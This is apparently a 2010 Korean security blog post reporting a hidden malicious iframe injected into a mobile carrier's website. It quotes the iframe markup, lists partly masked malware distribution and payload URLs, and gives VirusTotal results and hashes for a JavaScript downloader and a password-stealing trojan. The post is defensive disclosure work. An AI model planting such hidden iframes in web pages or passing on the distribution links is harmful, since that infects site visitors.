posted by Kwan's 2010. 7. 9. 14:34
지금 현재 모 휴대폰 통신사 큐x텔에는 악성 아이프레임이 삽입되어서 연결하고 있는것으로 보인다,.
사이트 내 소스를 보면 금방 악성코드가 삽입되어 있는것을 볼 수가 있다 !!
</script>
</head>
<iframe height=0 width=0 Src= http://110.xx.139.2x1/css/Lib.asp </iframe>
<body style="margin:0" bgcolor="#ffffff">
<script language="JavaScript">flash('/inc/flash/main.swf','936','232','1');</script>

몇주동안 잠잠 하더니 자시 한번 악성코드에 감염된거 같다. 2주만에 다시 그러니 관리자가 뭐하고 있는지. 그래도 스크립트는 오래된것이 아니라 그런지 대부분의 업체에서 전부 진단을 함으로 신고 할 필요가 없을듯 싶다. 최종파일 위치까지 예전이랑 똑같아서 이제는 그럴려니 하고 넘어간다. 그래도 통신사인데 휴대폰 업데이트나 , 정보를 찾아가는 사람들이 백신이 없다면 감염되기 쉽상일꺼 같다. 빨리 관리자 분이 보셔서 삭제하길 희망한다. !!

감염 사이트 : http://www.cuxxtel.com
악성유포지 :  http://110.xx.139.2x1/css/Lib.asp
최종파일 : http://61.1xx.x.93/css/isa.exe

[바이러스 토탈 결과]

검사 파일: lib.asp 전송 시각: 2010.07.09 05:04:15 (UTC)
안티바이러스 엔진 버전 정의 날짜 검사 결과
a-squared 5.0.0.31 2010.07.09 Virus.JS.Downloader.QJ!IK
AhnLab-V3 2010.07.09.00 2010.07.08 JS/Downloader
AntiVir 8.2.4.10 2010.07.08 JS/Drop.A.5851
Antiy-AVL 2.0.3.7 2010.07.08 -
Authentium 5.2.0.5 2010.07.09 -
Avast 4.8.1351.0 2010.07.08 JS:Downloader-QJ
Avast5 5.0.332.0 2010.07.08 JS:Downloader-QJ
AVG 9.0.0.836 2010.07.08 Script/Exploit
BitDefender 7.2 2010.07.09 Trojan.Script.407264
CAT-QuickHeal 11.00 2010.07.09 -
ClamAV 0.96.0.3-git 2010.07.08 -
Comodo 5368 2010.07.09 -
DrWeb 5.0.2.03300 2010.07.09 -
eSafe 7.0.17.0 2010.07.08 -
eTrust-Vet 36.1.7693 2010.07.08 -
F-Prot 4.6.1.107 2010.07.08 JS/Crypted.GA.gen
F-Secure 9.0.15370.0 2010.07.09 Trojan.Script.407264
Fortinet 4.1.133.0 2010.07.08 -
GData 21 2010.07.09 Trojan.Script.407264
Ikarus T3.1.1.84.0 2010.07.09 Virus.JS.Downloader.QJ
Jiangmin 13.0.900 2010.07.08 -
Kaspersky 7.0.0.125 2010.07.09 Trojan-Downloader.JS.Agent.fhk
McAfee 5.400.0.1158 2010.07.09 -
McAfee-GW-Edition 2010.1 2010.07.05 Heuristic.BehavesLike.JS.Exploit.A
Microsoft 1.5902 2010.07.08 -
NOD32 5263 2010.07.08 probably a variant of JS/TrojanDownloader.Agent
Norman 6.05.11 2010.07.08 -
nProtect 2010-07-08.01 2010.07.08 Script-JS/W32.Agent.WH
Panda 10.0.2.7 2010.07.08 -
PCTools 7.0.3.5 2010.07.09 -
Prevx 3.0 2010.07.09 -
Rising 22.55.04.01 2010.07.09 Trojan.DL.Script.JS.Agent.qx
Sophos 4.54.0 2010.07.09 JS/Agent-MZX
Sunbelt 6562 2010.07.09 -
Symantec 20101.1.0.89 2010.07.09 -
TheHacker 6.5.2.1.311 2010.07.08 -
TrendMicro 9.120.0.1004 2010.07.09 -
TrendMicro-HouseCall 9.120.0.1004 2010.07.09 -
VBA32 3.12.12.6 2010.07.08 -
ViRobot 2010.6.29.3912 2010.07.09 JS.S.Agent.5851
VirusBuster 5.0.27.0 2010.07.08 -
 
추가 정보
File size: 5851 bytes
MD5...: 51e7b5fe2fa7ef45de3b3671ba91b011
SHA1..: e6e7dd63b6de5b8b24c5a91d001d23a01de8186b
SHA256: 1d373a0cd0b239795370655695fb7db3138ab1aa1a4cb4df676f72150d82a7b9
검사 파일: isa.exe 전송 시각: 2010.07.09 05:04:22 (UTC)
안티바이러스 엔진 버전 정의 날짜 검사 결과
a-squared 5.0.0.31 2010.07.09 Trojan.Peed!IK
AhnLab-V3 2010.07.09.00 2010.07.08 Win-Trojan/Onlinegamehack.55296.G
AntiVir 8.2.4.10 2010.07.08 TR/Crypt.ZPACK.Gen
Antiy-AVL 2.0.3.7 2010.07.08 -
Authentium 5.2.0.5 2010.07.09 -
Avast 4.8.1351.0 2010.07.08 Win32:Malware-gen
Avast5 5.0.332.0 2010.07.08 Win32:Malware-gen
AVG 9.0.0.836 2010.07.08 PSW.Generic8.DOZ
BitDefender 7.2 2010.07.09 Trojan.Generic.KD.18284
CAT-QuickHeal 11.00 2010.07.09 (Suspicious) - DNAScan
ClamAV 0.96.0.3-git 2010.07.08 Trojan.Agent-164869
Comodo 5368 2010.07.09 -
DrWeb 5.0.2.03300 2010.07.09 -
eSafe 7.0.17.0 2010.07.08 Win32.TRCrypt.ZPACK
eTrust-Vet 36.1.7693 2010.07.08 -
F-Prot 4.6.1.107 2010.07.08 -
F-Secure 9.0.15370.0 2010.07.09 Trojan.Generic.KD.18284
Fortinet 4.1.133.0 2010.07.08 -
GData 21 2010.07.09 Trojan.Generic.KD.18284
Ikarus T3.1.1.84.0 2010.07.09 Trojan.Peed
Jiangmin 13.0.900 2010.07.08 Trojan/PSW.Magania.anlt
Kaspersky 7.0.0.125 2010.07.09 -
McAfee 5.400.0.1158 2010.07.09 PWS-Mmorpg!pq
McAfee-GW-Edition 2010.1 2010.07.05 Heuristic.LooksLike.Trojan.Crypt.ZPACK.B
Microsoft 1.5902 2010.07.08 PWS:Win32/Magania.gen
NOD32 5263 2010.07.08 -
Norman 6.05.11 2010.07.08 W32/Suspicious_Gen2.BHOYR
nProtect 2010-07-08.01 2010.07.08 Trojan/W32.Agent.55296.IL
Panda 10.0.2.7 2010.07.08 Trj/CI.A
PCTools 7.0.3.5 2010.07.09 -
Prevx 3.0 2010.07.09 High Risk Cloaked Malware
Rising 22.55.04.01 2010.07.09 Trojan.Win32.Generic.521B263B
Sophos 4.54.0 2010.07.09 Sus/UnkPack-C
Sunbelt 6562 2010.07.09 Trojan.Win32.Generic!BT
Symantec 20101.1.0.89 2010.07.09 -
TheHacker 6.5.2.1.311 2010.07.08 -
TrendMicro 9.120.0.1004 2010.07.09 PAK_Generic.001
TrendMicro-HouseCall 9.120.0.1004 2010.07.09 -
VBA32 3.12.12.6 2010.07.08 Malware-Dropper.Win32.Inject.gen
ViRobot 2010.6.29.3912 2010.07.09 Trojan.Win32.PSWMagania.55296.K
VirusBuster 5.0.27.0 2010.07.08 -
 
추가 정보
File size: 55296 bytes
MD5...: a4bd25915a827fe01c44926cc44273fe
SHA1..: 0748e6f3d2a27a5b852737bd40a86d9dcdce06c3
SHA256: d030b52bafbe52bb6e2527e94a325b1e3c996e17eab2789c601179bdb5e9c9ea


[이전글]

[security/악성코드 유포] - http://cpm2.XX66.org:88/Xo/Xi05.htm : JS:CVE-2010-0806-AK
[security/악성코드 유포] - http://gft54577.3xx2.org:6677/x/index.html 변조!!

댓글을 달아 주세요

  1. hoo 2010.07.09 16:41  Addr  Edit/Del  Reply

    줄기차게 나오네요..
    잘보고 갑니다~

    • Kwan's 2010.07.10 17:30 신고  Addr  Edit/Del

      Lib.asp 는 항상 똑같은곳에서 유포하는데 아직까지도 삭제되지않는거 보니 관리자가 손을 놓고 있나봐요~